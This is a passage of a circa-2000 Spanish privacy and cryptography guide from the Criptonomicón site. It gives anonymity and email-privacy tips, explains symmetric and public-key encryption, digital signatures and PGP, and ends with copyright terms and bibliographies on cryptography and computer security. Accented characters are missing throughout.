ActiveX, CGI, en programas de correo, etc. Utiliza la ltima versin disponible, que
se supone ser ms segura que las anteriores.

Borra la informacin comprometida


Eres consciente de todo lo que queda flotando por tu disco duro (en la papelera de
reciclaje)? Viejos correos, cookies, noticias de Usenet, los sitios Web que has
visitado en el ltimo mes, los ltimos documentos que has abierto. Un libro abierto
para cualquiera que quiera leerlo. Impdelo! Borra a conciencia. Srvete de
utilidades como Without a Trace (freeware).

Usa distintas cuentas de correo


Si quieres enviar correos confidenciales desde el trabajo, contrata una cuenta con un
proveedor de Internet o mejor an, hazlo desde casa, pero sin usar tu nombre real,
para qu arriesgarse. Puedes utilizar servicios gratuitos como HotMail.

Usa repetidores de correo annimos


No expongas tu identidad intilmente en grupos de noticias, listas de distribucin, o
cuando escribes a cualquier destinatario que no conviene conozca tu verdadera
identidad. Para eso estn los repetidores de correo annimos. Y son gratuitos!

Participa en las news de forma annima


DejaNews ha lanzado un servicio de participacin annima en las news, que tras
registrarnos, nos permitir enviar de manera completamente annima noticias en
cualquiera de los innumerables grupos de noticias. Las instrucciones paso a paso para
registrarse y enviar noticias annimamente los podis encontrar en la pginas de
DejaNews.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/intimidad.html (1 of 3) [25/10/2000 02:30:37 p.m.]

Cmo proteger la intimidad

Navega annimamente
Qu necesidad hay de dejar nuestra direccin IP all por donde pasemos?
Demasiadas cookies en nuestro disco duro? Aydate de la navegacin annima y
nadie sabr por dnde andas.

Cifra y firma los correos confidenciales


Si no quieres que cualquiera lea tus correos, pero te interesa conservar tu identidad,
cifra los correos y frmalos. As el destinatario estar seguro de que nadie ms lee los
mensajes que t y slo t le envas. Si slo aceptas como vlidos los correos
firmados no te expones a que nadie suplante la personalidad (spoofing) de otro y te
engae, por ejemplo, anuncindote que tu novia te ha abandonado por tu mejor
amigo. Puedes infomarte sobre estos temas en la seccin sobre correo seguro.

No reveles datos personales innecesariamente


A menudo al navegar por la Red nos encontramos con formularios que nos piden
ciertos datos personales. Rellena slo aquellos que consideres sean relevantes para el
servicio que se ofrece. Si rellenas los datos para una suscripcin a una revista en
lnea sobre jardinera no es lo mismo contar que tu modem es de 33,6 K y que adoras
las orqudeas que decir a cunto ascienden tus ingresos o cuntos hijos tienes.

Usa servidores seguros


Cada vez ms sitios Web ofrecen la posibilidad de navegacin segura. sala cuando
sea posible. Escribe a los webmaster animndoles a que lo adopten en su sitio. Para
saber si un servidor Web es seguro, basta con comprobar el URL. Si empieza con
https:// en vez de http://, el sitio posee un servidor seguro. Para news es igual: si
empieza con snews: en lugar de news:, entonces el servidor de news es seguro.

Entrate de las polticas respecto a la privacidad


Ante la falta de legislacin al respecto, el usuario est desprotegido, ya que la ley no
le ampara (sin ir ms lejos, es legal que el jefe lea los correos de sus empleados).
Entrate de si en tu puesto de trabajo se monitoriza tu actividad. Cuando te pidan
informacin personal en un sitio Web, busca si tienen definida una poltica. dem
antes de suscribirte a listas de distribucin. Si quieres, puedes leer la poltica sobre
privacidad del Criptonomicn.

No pidas que te enven correos indeseados


A veces al registrarte en un sitio, te preguntan si quieres recibir correos. La casilla
suele estar marcada por defecto. Tenlo en cuenta por si no quieres recibirlos. Por
ejemplo, esta prctica la utilizo en mi libro de visitas.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/intimidad.html (2 of 3) [25/10/2000 02:30:37 p.m.]

Cmo proteger la intimidad

Brrate de los directorios de bsqueda


Existen muchos directorios en los que puede aparecer tu nombre, correo electrnico,
direccin, telfono e incluso ms. Si no te gusta la idea, escribe a cada servicio:
Four11, Bigfoot, Internet Address Finder, WhoWhere, etc. En sus FAQ te explican
cmo hacerlo.

Brrate de archivos de bsqueda de noticias


Escribir x-no-archive: yes al principio de tu noticia hace que luego no aparezca en
motores de bsqueda como AltaVista o Deja News. Mucho mejor an, DejaNews
ofrece un servicio gratis de correo antispam.

Qujate
Si recibes correo basura y puedes averiguar de quin procede o al menos su
proveedor de Internet, escrbeles quejndote.

Usa tu sentido comn


No corras riesgos tontos. Si ests en el trabajo, no visites sitios porno ni escribas
correos poniendo verde al jefe ni leas las noticias de alt.sex (o cosas peores).

Productos comerciales
Puedes encontrar una resea de productos en los nmeros atrasados del Boletn del
Criptonomicn, que se actualiza con una periodicidad aproximadamente semanal.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/intimidad.html (3 of 3) [25/10/2000 02:30:37 p.m.]

Correo seguro - Cifrado

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Cifrado
El cifrado consiste en transformar un texto en claro (inteligible
por todos) mediante un mecanismo de cifrado en un texto cifrado,
gracias a una informacin secreta o clave de cifrado. Se distinguen
dos mtodos generales de cifrado:

Linux

Cifrado simtrico

Navegacin segura

Cuando se emplea la misma clave en las operaciones de cifrado y


descifrado, se dice que el criptosistema es simtrico o de clave
secreta (v. figura). Estos sistemas son mucho ms rpidos que los
de clave pblica, y resultan apropiados para el cifrado de grandes
volmenes de datos.

Introduccin

Cifrado

Firma digital

Proteger el correo

Control de acceso

CGI

Recursos

Java

sta es la opcin utilizada para cifrar el cuerpo del mensaje. Para ello se emplean
algoritmos como IDEA, RC5, DES, TRIPLE DES, etc.

JavaScript

Cifrado asimtrico

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Por otro lado, cuando se utiliza una pareja de claves para separar los procesos de
cifrado y descifrado, se dice que el criptosistema es asimtrico o de clave pblica.
Una clave, la privada, se mantiene secreta, mientras que la segunda clave, la pblica,
es conocida por todos. De forma general, las claves pblicas se utilizan para cifrar y
las privadas, para descifrar (v. figura). El sistema posee la propiedad de que a partir
del conocimiento de la clave pblica no es posible determinar la clave privada ni
descifrar el texto con ella cifrado. Los criptosistemas de clave pblica, aunque ms
lentos que los simtricos, resultan adecuados para los servicios de autenticacin,
distribucin de claves de sesin y firmas digitales, como se explicar posteriormente.
Se utilizan los algoritmos de RSA, Diffie-Hellman, etc.
En general, el cifrado asimtrico se emplea para cifrar las claves de sesin utilizadas
para cifrar el documento, de modo que puedan ser transmitidas sin peligro a travs de
la Red junto con el documento cifrado, para que en recepcin ste pueda ser
descifrado. La clave de sesin se cifra con la clave pblica del destinatario del
mensaje, que aparecer normalmente en una libreta de claves pblicas.

Web seguro

El cifrado asimtrico se emplea tambin para firmar documentos y autenticar


entidades, como se describe a continuacin.

Susurros desde la Cripta

Pgina siguiente: firmas digitales.

file:///C|/TEMP/criptonomicon/criptonomicon/correo/cifrado.html (1 of 2) [25/10/2000 02:30:37 p.m.]

Correo seguro - Cifrado


Consejos prcticos

Referencias

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Libro de Visitas

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/correo/cifrado.html (2 of 2) [25/10/2000 02:30:37 p.m.]

Correo seguro - Firma digital

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Firma digital
En principio, basta con cifrar un documento con la clave privada
Introduccin
para obtener una firma digital segura, puesto que nadie excepto el
poseedor de la clave privada puede hacerlo. Posteriormente,
Cifrado
cualquier persona podra descifrarlo con la clave pblica,
demostrndose as la identidad del firmante. En la prctica, debido
Firma digital
a que los algoritmos de clave pblica son muy ineficaces a la hora
de cifrar documentos largos, los protocolos de firma digital se
Proteger el correo
implementan junto con funciones unidireccionales de resumen
(hash), de manera que en vez de firmar un documento, se firma un
Recursos
resumen del mismo. Este mecanismo implica el cifrado, mediante
la clave privada del emisor, del resumen de los datos, que sern
transferidos junto con el mensaje. ste se procesa una vez en el receptor, para
verificar su integridad. Por lo tanto, los pasos del protocolo son (v. figura):
1.
2.
3.
4.

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

A genera un resumen del documento.


A cifra el resumen con su clave privada, firmando por tanto el documento.
A enva el documento junto con el resumen firmado a B.
B genera un resumen del documento recibido de A, usando la misma funcin
unidireccional de resumen. Despus descifra con la clave pblica de A el
resumen firmado. Si el resumen firmado coincide con el resumen que l ha
generado, la firma es vlida.

De esta forma se ofrecen conjuntamente los servicios de no repudio, ya que nadie


excepto A podra haber firmado el documento, y de autenticacin, ya que si el
documento viene firmado por A, podemos estar seguros de su identidad, dado que
slo l ha podido firmarlo. En ltimo lugar, mediante la firma digital se garantiza
asimismo la integridad del documento, ya que en caso de ser modificado, resultara
imposible hacerlo de forma tal que se generase la misma funcin de resumen que
haba sido firmada.

Informacin adicional

Correo seguro

Para aprender ms sobre los mecanismos de seguridad, puedes ir a las pginas


sobre seguridad.

Web seguro

Para aprender ms sobre firmas digitales y autoridades de certificacin en


Espaa, lee el artculo Espaa, a la vanguardia de las firmas electrnicas o
Los secretos de la firma electrnica.

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/correo/firma.html (1 of 2) [25/10/2000 02:30:38 p.m.]

Correo seguro - Firma digital


Consejos prcticos

Para aprender ms sobre criptogafa de clave pblica, lee el artculo PKI o los
cimientos de una criptografa de clave pblica.

Referencias

Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/correo/firma.html (2 of 2) [25/10/2000 02:30:38 p.m.]

Correo seguro - Proteger el correo

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Cmo proteger nuestro correo


Lo mejor es instalar un programa de cifrado de correo.
Indiscutiblemente, la mejor opcin es el PGP. Se puede encontrar
informacin relacionada y bajar el software en PGP internacional.
En cualquier caso, los clientes ms recientes como el Outlook
Express de Microsoft ya incorporan herramientas criptogrficas
para cifrado y firma de correos. Necesitan el concurso de una
autoridad de certificacin, como por ejemplo la pionera y hoy
ubicua VeriSign. Otras autoridades de certificacin en Espaa son
FESTE, ACE y la FNMT. No dejes de leer el artculo Espaa, a
la vanguardia de las firmas electrnicas, para comprender mejor
el funcionamiento y misin de las autoridades de certirficacin.

Introduccin

Cifrado

Firma digital

Proteger el correo

Recursos

Java

JavaScript

Cookies

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/correo/proteger.html (1 of 2) [25/10/2000 02:30:38 p.m.]

Correo seguro - Proteger el correo


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/correo/proteger.html (2 of 2) [25/10/2000 02:30:38 p.m.]

Correo seguro - Cifrado

Suscripcin gratis

Intimidad?

Recursos en la Red sobre PGP

Artculos

Taller de Criptografa - PGP


Pgina para principiantes en el uso de PGP

Seguridad

Introduccin

Cifrado

Kriptpolis
Firma digital
Linux

Seguridad en el correo electrnico y PGP

Navegacin segura

PGP -= Font Peich =-

Proteger el correo

Control de acceso

How To - Pretty Good Privacy

Recursos

Alakarga PGP Mail


CGI

Pretty Good Privacy, Inc. Home Page

Java

PGP Pretty Good Privacy : Eugeni Web

JavaScript

Mail 0bscur0
Todo sobre el PGP

Cookies

The International PGP Home Page


Crashes

Lista sobre PGP en RedIris

Agujeros

Spam

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

Remailers

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/correo/recursoscorreo.html (1 of 2) [25/10/2000 02:30:38 p.m.]

Correo seguro - Cifrado


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/correo/recursoscorreo.html (2 of 2) [25/10/2000 02:30:38 p.m.]

Informacin sobre Copyright

Suscripcin gratis

Trminos y condiciones de uso


Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Todos los materiales contenidos en el Criptonomicn, localizable en


www.iec.csic.es/criptonomicon/, y mientras no se mencione lo contrario, son propiedad
intelectual de Gonzalo lvarez Maran y del CSIC. Los contenidos presentados en
estas pginas slo podrn ser reproducidos, distribuidos o utilizados en cualquier
forma o soporte (electrnica, impresa, magntica, etc.) segn las siguientes
condiciones:
Los contenidos deben permanecer en su forma original, si bien pueden ser
modificados ligeramente para adaptarse a un equipo o configuracin de red
especfica.
El contenido debe incluir el siguiente texto junto con un enlace al
Criptonomicn: "Este contenido se incluye con permiso del Criptonomicn.
Copyright 1997-1999 Gonzalo lvarez, CSIC. Todos los derechos
reservados."
Se puede imprimir y distribuir su contenido en formato impreso bajo los
mismos trminos.
El contenido deber ser distribuido exclusivamente a sus clientes, estudiantes o
empleados directos.
El contenido no puede ser distribuido con nimo de lucro. Si usted pertenece a
una entidad comercial, podra aun as distribuir el contenido siempre que no
cobre por ello.
Si tiene alguna duda acerca de si un uso concreto del Criptonomicn est permitido o
prohibido, enve un correo electrnico a:

Agujeros

Spam

Si lo deseas, puedes utilizar mi clave pblica PGP.

Remailers

Renuncia

Anonimato

Este servicio informativo es completamente gratuito. El tema central es siempre la


seguridad y la privacidad, por lo que ser responsabilidad del lector el seguir los
vnculos suministrados en estas pginas, ya que algunos podran amenazarlas. Por
otro lado, en las pginas y en los boletines se habla de programas y a veces se
suministra enlaces a los mismos, que una vez instalados en el ordenador del usuario
podran no funcionar como se esperaba o causarles algn dao. Nuevamente, es
responsabilidad del lector descargar, instalar y ejecutar en su propio sistema los
programas que se mencionen en el Criptonomicn (algunos de los cuales no he

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/copyright.html (1 of 2) [25/10/2000 02:30:39 p.m.]

Informacin sobre Copyright


Consejos prcticos

llegado a probar), por lo que declino toda responsabilidad.

Referencias

Aspectos jurdicos y legales de Internet

Libro de Visitas

Visite la excelente pgina administrada por Manuel Porras Quintela, sobre Derecho,
Informtica y Tecnologas de la Informacin y Comunicaciones. Si desea saber en
qu situacin se encuentra el Derecho, en relacin con estos temas, tan slo tiene que
navegar por sus pginas y empaparse del conocimiento jurdico del final del milenio.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/copyright.html (2 of 2) [25/10/2000 02:30:39 p.m.]

Referencias sobre criptografa y seguridad

Suscripcin gratis

Intimidad?

En estas pginas encontraris abundantes referencias, tanto


bibliogrficas como de Internet, sobre criptografa y seguridad.

Criptografa moderna

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

Divulgacin

Los contenidos los ir actualizando peridicamente, a medida que


se vayan publicando nuevos libros, artculos, pginas Web, etc.

Teora de nmeros y
codificacin

Obviamente, aunque la lista es exhaustiva, no pretende incluir


Seguridad
absolutamente TODO, lo cual se ha tornado una empresa intil
hoy da, habida cuenta del auge que est experimentando la
Criptoanlisis
criptografa y la preocupacin generalizada que suscita la
Artculos
seguridad informtica. En respuesta a la creciente demanda, se
Revistas
publican cada vez ms libros y artculos en prensa especializada o
de divulgacin, noticias de hackers acaparan titulares de
Otros
peridicos e incluso se dedica al tema pequeos espacios en TV.
Podra pensarse en el advenimiento de una edad dorada de la criptografa?
Por supuesto, agradecer cualquier tipo de contribuciones que aportis para ampliar
esta lista, siempre incompleta.

JavaScript

Cookies

Crashes

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/referencias.html (1 of 2) [25/10/2000 02:30:39 p.m.]

Referencias sobre criptografa y seguridad


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/referencias.html (2 of 2) [25/10/2000 02:30:39 p.m.]

Divulgacin, historia de la criptografa y criptografa clsica

Suscripcin gratis

Intimidad?

Artculos

Divulgacin, historia de la criptografa y


criptografa clsica

Seguridad

J. Bamford: The Puzzle Palace. Houghton Mifflin, Boston, 1982.


Linux

Navegacin segura

Control de acceso

CGI

Cipher A. Deavours y Louis Kruh: Machine Cryptography and


Modern Cryptanalysis. Artech House, 610 Washington St.,
Dedham, MA 02026, 1985.

Divulgacin
Criptografa moderna
Teora de nmeros y

Cipher A. Deavours y Louis Kruh: Cryptology, Yesterday Today


and Tomorrow. Artech House, 1987.
Cipher A. Deavours y Louis Kruh: Cryptology: Machines, History
& Methods. Artech House, 1989.

Java

Ladislas Farago: El sello roto. Bruguera 1974.

JavaScript

William F. Friedman: Solving German Codes in World War I.


Aegean Park Press.

codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
Otros

Cookies

H. Gaines: Cryptanalysis, a study of ciphers and their solution. Dover Publications,


1956.

Crashes

Andrew Hodges: Alan Turing: The Enigma. Burnett Books Ltd., 1983

Agujeros

D. Kahn: The Codebreakers. Macmillan Publishing, 1967.


David Kahn: Seizing the Enigma. Houghton Mifflin, 1991.

Spam

Andrea Sgarro: Cdigos secretos. Pirmide, 1990.


Remailers

Anonimato

A. Sinkov: Elementary Cryptanalysis. Math. Assoc. Am. 1966.


Barbara W. Tuchman: El telegrama Zimermann. Argos-Vergara, 1984.
Gordon Welchman: The Hut Six Story. McGraw-Hill, 1982.

Correo seguro

Web seguro
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Susurros desde la Cripta

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/divulgacion.html (1 of 2) [25/10/2000 02:30:39 p.m.]

Divulgacin, historia de la criptografa y criptografa clsica


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/divulgacion.html (2 of 2) [25/10/2000 02:30:39 p.m.]

Criptografa moderna

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Criptografa moderna
D. Bayer, S. Haber, and W.S. Stornetta: Improving the efficiency
and reliablility of digital time-stamping. In R.M. Capocelli, editor,
Sequences '91: Methods in Communication, Security, and
Computer Science, Springer-Verlag, Berlin, 1992.

Divulgacin
Criptografa moderna
Teora de nmeros y

H. Beker, F. Piper: Cipher Systems. Wiley, 1982.

codificacin
Seguridad

H. Beker, F. Piper: Cryptography and Coding. Oxford, 1989.


Control de acceso

Eli Biham y Adi Shamir: Differential Cryptanalysis of the Data


Encription Standard. Springer-Verlag, 1993.

Criptoanlisis

CGI

Java

Gilles Brassard: Modern Cryptology: a tutorial. Spinger-Verlag,


1988.

Artculos
Revistas
Otros

Pino Caballero: Introduccin a la Criptografa. Ra-Ma, Madrid, 1996


JavaScript

Cookies

Luis Camacho: El delito informtico. ISBN 84-404-0495-6. 1987.


CESID: Glosario de terminos de Criptologia. CESID, Madrid, 1991.
Ben-Zior Chor: Two issues in public key cryptography. The MIT Press.

Crashes

James Cooper: Computer and Communications Security. Mc. Graw Hill, 1989.
Agujeros

E. Dawson and J. Golic: Criptography: Policy and Algoritms. Spriger Verlag, Berlin,
1995.

Spam

Remailers

D. E. Robling Denning: Cryptography and Data Security. Addison-Wesley


Publishing Company, Reading, 1983.
C. Ding: The stability theory of stream ciphers. Springer-Verlag, 1991.

Anonimato

K.M. Jackson y J. Hruska: Computer Security Reference Book.


Butterwoth-Heinemann, 1992.

Correo seguro

Web seguro

A. Konheim: Cryptography: a primer. Wiley, 1981. [KRA 86] Evangelos Kranakis:


Primality and Cryptography. Wiley, 1986.
S. Kullback: Statistical Methods in Cryptanalysis. Aegean Park Press, 1976.

Susurros desde la Cripta

Alfred Menezes: Elliptic curve public key Cryptosysthems. Kluwer, 1993.

file:///C|/TEMP/criptonomicon/criptonomicon/moderna.html (1 of 2) [25/10/2000 02:30:40 p.m.]

Criptografa moderna
Consejos prcticos

C.H. Meyer, S.M. Matyas: Cryptography: A New Dimension in Computer Data


Security. John Willey & Sons, New York, N.Y., 1982.

Referencias

Jos Mara Molina Mateos: Seguridad, informacin y poder. Incipit, 1994.

Libro de Visitas

Wayne Patterson: Mathematical Cryptology for Computer Scientists and


Mathematicians. Rowman & Littlefield, 1987. [PFL 89] C. Pfleeger: Security in
Computing. Prentice-Hall, 1989.
W. Price, D. Davies: Security for computer networks. Wiley, 1984.
Michael Purser: Secure data networking. Artech House, 1993.
J. Rif y Ll. Huguet, Comunicacin digital: Teoria matemtica de la Informacin,
Codificacin Algebraica y Criptologia, Masson, S.A., Barcelona, 1991.
Amador Rodriguez Prieto, Proteccin de la Informacin. Paraninfo, 1986.
R. Rueppel, Design and Analysis of Stream Ciphers. Springer-Verlag, 1986.
A. Saloma, Public-key cryptography. Springer-Verlag, 1990.
B. Schneier, Applied Cryptography. John Wiley & Sons, 1995.
Seberry, J. Pieprzyk, CRIPTOGRAPHY, an introducction to Computer Security,
Prentice Hall, 1988.
G. J. Simmons, Contemporary Criptology, the science of Information Integrity IEEE
Press, 1992.
Douglas R. Stinson, Cryptography, Theory and Practice. CRC Press, 1995.
H.C. van TILBORG, "An Introduction to Cryptology". Kluwer Academic Publishers,
1988.
Don J. Torrieri: Principles of Secure Communication Systems. Artech House,
Dedham MA., 1985.
D. Welsh, Codes and Cryptography. Claredon Press, 1988.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/moderna.html (2 of 2) [25/10/2000 02:30:40 p.m.]

Teora de nmeros y codificacin

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Teora de nmeros y codificacin


Leonard M. Adleman, Ming-Deh Huang: Algoritmic Number
Theory. Springer-Verlag, 1994.

Divulgacin
Criptografa moderna

Linux

Navegacin segura

Control de acceso

Norman Abramson: Teora de la Informacin y Codificacin,


Paraninfo, 1981.

Teora de nmeros y
codificacin

E. Bach and J. Shallit: Algoritmic Number Theory, The MIT


Press, Cambridge MA., 1996.
D.A. Bell: Information Theory and its Engeneering Applications,
Pitman & Sons, London, 1952.

CGI

Java

JavaScript

E. R. Berlekamp: The Development of coding Theory. IEEE


Press, New York, 1974.

Seguridad
Criptoanlisis
Artculos
Revistas
Otros

D.M. Bressoud. Factorization and Primality Testing. Undergraduate Texts in


Mathematics, Springer-Verlag, New York, 1989.

Cookies

Henri Cohen: A course in Computational Algebraic Number Theory.


Springer-Verlag, 1993.

Crashes

T.H. Cormen, C.E. Leiserson, and R.L. Rivest. Introduction to Algorithms. MIT
Press, Cambridge, Massachusetts, 1990.

Agujeros

S. Golomb: Shift Register Sequences. Prentice-Hall Inc., 1967.

Spam

I. J. Good: Good Thinking: the foundations of probability and its applications.


University of Minnesota Press, 1983.

Remailers

Anonimato

Correo seguro

G.H. Hardy y E.M. Wright: An introduction to the Theory of Numbers. Oxford,


1993.
D.E. KNUTH: "The Art of Computer Programming". Vol. 1, Fundamental
Algorithms. Addison-Wesley, 1973.
D.E. KNUTH: "The Art of Computer Programming". Vol. 3, Sorting and Searching.
Addison-Wesley, 1973.

Web seguro

Susurros desde la Cripta

D. E. Knuth: The Art of Computer Programming, Vol 2: Seminumerical Algorithms.


Addison-Wesley, 1981.

file:///C|/TEMP/criptonomicon/criptonomicon/numeros.html (1 of 2) [25/10/2000 02:30:41 p.m.]

Teora de nmeros y codificacin


Consejos prcticos

N. Koblitz: Introduction to Elliptic Curves and Modular Forms. Springer-Verlag,


1984.

Referencias

N. Koblitz: A course in number theory and cryptography. Springer-Verlag, 1987.

Libro de Visitas

Solomon Kullback, Information Theory and Statistics. Dover, 1968.


A.K. Lenstra y H.W. Lenstra. The development of the number field sieve.
Springer-Verlag, 1993.
Rudolf Lidl y Harald Niederreiter: Introduction to finite fields and their applications.
Cambridge University Press, 1994.
R.J. McEliece: "Finite Fields for Computer Scientists and Engineers". Kluwer
Academic Publishers 1987.
Alfred Menezes: Applications of Finite Fields. Kluwer, 1993.
Paulo Ribenboim: The book of Prime Number Records. Springer-Verlag, 1988.
Paulo Ribenboim: The little book of BIG primes. Springer-Verlag, 1991.
Hans Riesel: Prime numbers and Computer Methods for Factrization. Birkhuser,
Berlin, 1994.
Steven Roman: Coding and Information Theory. Springer-Verlag, 1992.
Kenneth H. Rosen: Elementary Number Theory and its Applications. Addison
Wesley, 1993.
Igor Shparlinski: Computational and Algoritmic Problems in Finite Fields. Kluwer,
1992.
A. Yao: Computational Information Theory. In Complexity in Information Theory,
ed. by Abu-Mostafa, 1988.
V.N. Yarmolik y S.N. Demidenko: Generation and application of Pseudorandom
Sequences for Random Testing. John Wiley and Sons, 1988.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/numeros.html (2 of 2) [25/10/2000 02:30:41 p.m.]

Seguridad en los ordenadores y redes de comunicacin

Suscripcin gratis

Intimidad?

Artculos

Seguridad en los ordenadores y redes de


comunicacin

Seguridad

Linux

Vijay Ahuja, Network and Internet Security, AP Professional,


1996.

Navegacin segura

Vijay Ahuja, Secure Commerce on the Internet, AP Professional,


1996.

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Divulgacin
Criptografa moderna
Teora de nmeros y

G. lvarez, "Uso de cookies", Mundo Internet '98, 371-379,


Madrid, febrero 1998.
Daniel J. Barrett, Bandits on the Information Superhighway,
O'Reilly & Associates, Inc., 1996.
D. Brent Chapman & Elizabeth D. Zwicky, Building Internet
Firewalls, O'Reilly & Associates, Inc., 1995.

codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
Otros

David A. Curry, Unix System Security, Addison-Wesley Publishing Company, 1992.


Warwick Ford, Michael S. Baum, Secure electronic commerce, Prentice Hall, 1997.
Martin Freiss, Protecting Networks with SATAN, O'Reilly & Associates, Inc., 1998.
Simson Garfinkel, PGP: Pretty Good Privacy, O'Reilly & Associates, Inc., 1994.

Agujeros

S. Garfinkel and G. Spafford, Practical UNIX and Internet Security, O'Reilly &
Associates, Inc., 1996.

Spam

Remailers

Simson Garfinkel with Gene Spafford, Web Security & Commerce, O'Reilly &
Associates, Inc., 1997.
Anup K. Ghosh, E-commerce security, John Wiley & Sons, Inc., 1998.

Anonimato

Correo seguro

Web seguro

Claudio Hernndez, Hackers (piratas tecnolgicos), Coelma, 1998.


David Icove, Karl Seger & William VonStorch (Consulting Editor Eugene H.
Spafford), Computer Crime: A Crimefighter's Handbook, O'Reilly & Associates,
Inc., 1995.
E. E. Kim, CGI Developer's Guide, c. 9, SAMS.net Publishing, 1996.

Susurros desde la Cripta

Pete Loshin, Personal Encryption Clearly Explained, AP Professional, 1997.

file:///C|/TEMP/criptonomicon/criptonomicon/refsegur.html (1 of 2) [25/10/2000 02:30:41 p.m.]

Seguridad en los ordenadores y redes de comunicacin


Consejos prcticos

Referencias

Manuel Mediavilla, Seguridad en UNIX, Ra-ma, 1997.


Gary McGraw and Edward W. Felten, Java Security, John Wiley & Sons, Inc., 1997.
Paul D. Robertson, Firewalls Clearly Explained, AP Professional, 1998.

Libro de Visitas

A. D. Rubin, D. Geer, and M. J. Ranum, Web Security Sourcebook, John Wiley &
Sons, Inc., 1997.
Deborah Russell & G.T. Gangemi, Sr., Computer Security Basics, O'Reilly &
Associates, Inc., 1991.
L. D. Stein, "The World Wide Web SecurityFAQ", WWW Consortium, Nov 1997.
Mark Taber, Maximum Security: A Hacker's Guide to Protecting Your Internet Site
and Network, Macmillan Computer Publishing, 1998.
John Vacca, Los secretos de la Seguridad en Internet, Anaya Multimedia, 1997.
Peter Wayner, Disappearing Cryptography, AP Professional, 1996.
Peter Wayner, Digital Copyright Protection, AP Professional, 1997.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/refsegur.html (2 of 2) [25/10/2000 02:30:41 p.m.]

